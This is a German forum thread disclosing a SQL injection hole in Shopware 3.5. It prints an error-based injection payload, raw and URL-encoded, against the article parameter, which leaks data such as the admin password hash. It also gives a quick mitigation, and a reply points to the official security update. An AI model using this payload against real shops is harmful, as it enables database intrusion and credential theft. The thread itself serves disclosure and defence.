Shopware 3.5 SQL Injection Exploit

Leider wird das Bugreporting-Tool auch nach Wochen “in wenigen Tagen in aktualisierter Form zur Verfügung stehen”. Also bleibt mir nichts anderes übrig, als hier auf folgenden SQL Injection Exploit aufmerksam zu machen: http://1337day.com/exploits/18986 Das Beispielscript des exploits liest mit 4 Anfragen wie /recommendation/bought/article/0 AND (SELECT 1 FROM (SELECT COUNT(\*), CONCAT((SELECT (SELECT COUNT(`id`) FROM `s_user`) FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)\*2)) x FROM `information_schema`.`tables` GROUP BY x) z) entspricht urlencoded /recommendation/bought/article/0+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28%2A%29%2C+CONCAT%28%28SELECT+%28SELECT+COUNT%28%60id%60%29+FROM+%60s\_user%60%29+FROM+%60information\_schema%60.%60tables%60+LIMIT+0%2C1%29%2C+FLOOR%28RAND%280%29%2A2%29%29+x+FROM+%60information\_schema%60.%60tables%60+GROUP+BY+x%29+z%29 sensible Information aus, wenn die Exceptions angezeigt werden. Unter anderen den Passwort-Hash des ersten Benutzers (admin). Was tun auf die Schnelle? Die Anzeige von Exceptions abschalten. In der Application.php im Hauptverzeichnis Zeile 16 auf false setzen. Damit ist aber leider noch nicht verhindert, dass überhaupt fremde SQL Anfragen über das article-parameter in die Datenbank kommen.

Hallo, das Thema wurde bereits hier behandelt. Auch gibt es bereits ein Sicherheitsupdate, sowie die Möglichkeit das optionale Plugin zu deinstallieren. Weitere Informationen findest du hier dazu: Wiki-Artikel: http://wiki.shopware.de/shopware.php?sV … rticle=860 Forum-Post: administration-f11/dingendes-sicherheitsupdate-fur-shopware-plugin-t7729.html